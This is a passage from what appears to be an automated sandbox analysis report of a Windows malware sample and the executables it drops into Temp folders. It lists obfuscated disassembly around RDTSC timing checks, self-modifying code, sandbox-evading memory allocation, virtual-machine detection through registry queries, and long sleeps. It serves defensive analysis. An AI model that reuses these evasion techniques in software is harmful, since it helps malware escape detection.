0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D087E second address: 50D08EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB7D50A5EDEh 0x00000011 sbb cx, 15B8h 0x00000016 jmp 00007FB7D50A5EDBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB7D50A5EE8h 0x00000022 or esi, 3D92D018h 0x00000028 jmp 00007FB7D50A5EDBh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D08EB second address: 50D08F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D08F1 second address: 50D090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EE8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D090D second address: 50D0911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0911 second address: 50D0925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, esi 0x0000000e mov ecx, 03FD67BBh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0925 second address: 50D0935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0935 second address: 50D095F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB7D50A5EE5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D095F second address: 50D096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D096F second address: 50D097D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ecx, ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080032 second address: 5080038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080038 second address: 508003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508003C second address: 508005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D509B856h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508005F second address: 5080063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080063 second address: 5080069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080069 second address: 50800F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 5ED44E83h 0x00000008 mov si, 4FDFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB7D50A5EE0h 0x00000019 xor ax, B648h 0x0000001e jmp 00007FB7D50A5EDBh 0x00000023 popfd 0x00000024 call 00007FB7D50A5EE8h 0x00000029 pushfd 0x0000002a jmp 00007FB7D50A5EE2h 0x0000002f adc eax, 5098DBD8h 0x00000035 jmp 00007FB7D50A5EDBh 0x0000003a popfd 0x0000003b pop ecx 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FB7D50A5EE1h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50800F4 second address: 50800FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50800FA second address: 5080124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov ax, F3B9h 0x00000014 popad 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB7D50A5EDBh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080124 second address: 508012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508012A second address: 508012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508012E second address: 5080188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB7D509B84Eh 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FB7D509B850h 0x00000014 xchg eax, ebx 0x00000015 jmp 00007FB7D509B850h 0x0000001a push eax 0x0000001b jmp 00007FB7D509B84Bh 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB7D509B850h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080188 second address: 5080197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080197 second address: 508019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508019D second address: 50801A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50801A1 second address: 50801A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50801A5 second address: 50801E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b jmp 00007FB7D50A5EE7h 0x00000010 xchg eax, esi 0x00000011 jmp 00007FB7D50A5EE6h 0x00000016 push eax 0x00000017 pushad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50801E3 second address: 5080291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B853h 0x0000000b or esi, 50CB243Eh 0x00000011 jmp 00007FB7D509B859h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FB7D509B84Ch 0x00000020 adc si, 3938h 0x00000025 jmp 00007FB7D509B84Bh 0x0000002a popfd 0x0000002b mov edi, eax 0x0000002d popad 0x0000002e mov esi, dword ptr [ebp+08h] 0x00000031 jmp 00007FB7D509B852h 0x00000036 xchg eax, edi 0x00000037 jmp 00007FB7D509B850h 0x0000003c push eax 0x0000003d jmp 00007FB7D509B84Bh 0x00000042 xchg eax, edi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov eax, edx 0x00000048 call 00007FB7D509B857h 0x0000004d pop eax 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080291 second address: 50802AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EE5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50802AA second address: 50802AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50802AE second address: 5080305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FB7D50A5EDDh 0x0000000f je 00007FB846F54226h 0x00000015 jmp 00007FB7D50A5EDEh 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 pushad 0x00000022 push esi 0x00000023 mov bx, EE00h 0x00000027 pop ebx 0x00000028 mov eax, 5E9C4CF5h 0x0000002d popad 0x0000002e je 00007FB846F54214h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007FB7D50A5EDDh 0x0000003c pop esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080305 second address: 508030B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508030B second address: 508030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508030F second address: 508035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f call 00007FB7D509B84Dh 0x00000014 pushfd 0x00000015 jmp 00007FB7D509B850h 0x0000001a adc si, 01D8h 0x0000001f jmp 00007FB7D509B84Bh 0x00000024 popfd 0x00000025 pop ecx 0x00000026 popad 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ebx, ecx 0x0000002f mov si, D023h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508035C second address: 5080387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080387 second address: 508038C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508038C second address: 5080392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080392 second address: 5080414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB846F49B34h 0x0000000e jmp 00007FB7D509B859h 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FB7D509B84Ch 0x0000001e sbb cx, 8828h 0x00000023 jmp 00007FB7D509B84Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FB7D509B858h 0x0000002f adc ecx, 13DA3A88h 0x00000035 jmp 00007FB7D509B84Bh 0x0000003a popfd 0x0000003b popad 0x0000003c jne 00007FB846F49ADFh 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080414 second address: 5080418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080418 second address: 508041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508041E second address: 5080424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080424 second address: 5080428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070890 second address: 50708D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB7D50A5EE1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FB7D50A5EDEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov al, 62h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50708D5 second address: 507094D instructions: 0x00000000 rdtsc 0x00000002 call 00007FB7D509B859h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 and esp, FFFFFFF8h 0x00000015 pushad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB7D509B850h 0x0000001d adc ch, FFFFFFD8h 0x00000020 jmp 00007FB7D509B84Bh 0x00000025 popfd 0x00000026 call 00007FB7D509B858h 0x0000002b pop eax 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FB7D509B851h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 507094D second address: 5070974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007FB7D50A5EDCh 0x0000000d push eax 0x0000000e jmp 00007FB7D50A5EDBh 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070974 second address: 5070978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070978 second address: 5070993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070993 second address: 50709AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B854h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50709AB second address: 5070A3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FB7D50A5EE6h 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007FB7D50A5EE1h 0x00000018 jmp 00007FB7D50A5EE0h 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007FB7D50A5EDBh 0x00000024 and cx, E22Eh 0x00000029 jmp 00007FB7D50A5EE9h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 mov ebx, ecx 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a pushad 0x0000003b movzx eax, dx 0x0000003e mov bh, B3h 0x00000040 popad 0x00000041 sub ebx, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A3C second address: 5070A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A40 second address: 5070A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A46 second address: 5070A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 2Bh 0x00000005 mov esi, 41B3B523h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 call 00007FB7D509B851h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A6C second address: 5070A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 je 00007FB846F5B7F2h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A7E second address: 5070A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A82 second address: 5070A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A98 second address: 5070A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A9E second address: 5070AF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 jmp 00007FB7D50A5EDEh 0x00000017 mov ecx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB7D50A5EDDh 0x00000022 sbb ax, 7696h 0x00000027 jmp 00007FB7D50A5EE1h 0x0000002c popfd 0x0000002d movzx esi, bx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070AF4 second address: 5070AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070AFA second address: 5070AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070AFE second address: 5070BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B854h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FB846F510D1h 0x00000011 jmp 00007FB7D509B850h 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB7D509B84Eh 0x00000024 sbb ax, 1048h 0x00000029 jmp 00007FB7D509B84Bh 0x0000002e popfd 0x0000002f push esi 0x00000030 mov ax, dx 0x00000033 pop ebx 0x00000034 popad 0x00000035 jne 00007FB846F510A0h 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FB7D509B84Ch 0x00000042 sbb ecx, 3F7052A8h 0x00000048 jmp 00007FB7D509B84Bh 0x0000004d popfd 0x0000004e jmp 00007FB7D509B858h 0x00000053 popad 0x00000054 mov edx, dword ptr [ebp+0Ch] 0x00000057 jmp 00007FB7D509B850h 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e mov cx, 644Dh 0x00000062 push eax 0x00000063 push edx 0x00000064 mov ebx, esi 0x00000066 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 76EAAE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 920D62 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9A9F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 74EAAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 900D62 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 989F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 65AC40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 65AB58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 658196 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 808C32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Special instruction interceptor: First address: 6E5E08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Special instruction interceptor: First address: 50FC4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Special instruction interceptor: First address: 74783E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 3ADC0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 54BEA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 5583C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 5E4435 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 63DDC0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 657BEA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 3B0E4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 65883C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 6614435 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 176E113 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 15C53B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 17935F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 177E55E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 17F43E0 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory allocated: 1540000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory allocated: 2FE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory allocated: 4FE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6FF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 8FF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Memory allocated: 5150000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Memory allocated: 5470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Memory allocated: 7470000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_050F0D2C rdtsc 0_2_050F0D2C
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 894 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1047 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1030 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1034 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 364 Jump to behavior
